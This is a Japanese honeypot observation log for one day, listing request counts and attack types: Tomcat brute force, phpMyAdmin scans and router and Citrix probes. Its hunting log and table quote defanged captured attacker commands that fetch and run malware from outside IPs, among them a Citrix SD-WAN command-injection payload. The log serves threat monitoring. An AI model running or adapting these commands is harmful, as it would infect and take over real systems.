WOWHoneypot観察(275日目)
2019/12/16(月)
トータルは4036件でした。
ハンティングログは以下です。
149.200.148[.]89 wget+hxxp[:]//185.172.110[.]220/mipsel |
www.virustotal.com
www.virustotal.com
149.202.251[.]78 wget hxxp[:]//80.82.64.14/richard; curl -O hxxp[:]//80.82.64[.]14/richard |
149.202.251[.]78 curl -O hxxp[:]//80.82.64[.]14/richard |
件数 | 概要 | リクエスト |
---|---|---|
4002 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
19 | アクセス | GET / |
2 | ZmEuによるphpMyAdminのスキャン | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
2 | ZmEuによるphpMyAdminのスキャン | GET /pma/scripts/setup.php |
2 | ZmEuによるphpMyAdminのスキャン | GET /phpmyadmin/scripts/setup.php |
2 | ZmEuによるphpMyAdminのスキャン | GET /myadmin/scripts/setup.php |
1 | ZmEuによるphpMyAdminのスキャン | GET /phpMyAdmin/scripts/setup.php |
1 | ZmEuによるphpMyAdminのスキャン | GET /MyAdmin/scripts/setup.php |
1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
1 | Citrix SD-WAN Applianceの脆弱性を狙った通信 | POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`'%20%%2099999;%20wget%20hxxp[:]//80.82.64.14/richard;%20curl%20-O%20hxxp[:]//80.82.64.14/richard;%20chmod%20+x%20richard;%20sh%20richard |
1 | クローリング | HEAD /robots.txt |
1 | Webshell設置の調査 | GET /external.php |
1 | phpMyAdminの調査 | GET /admin/connection/ |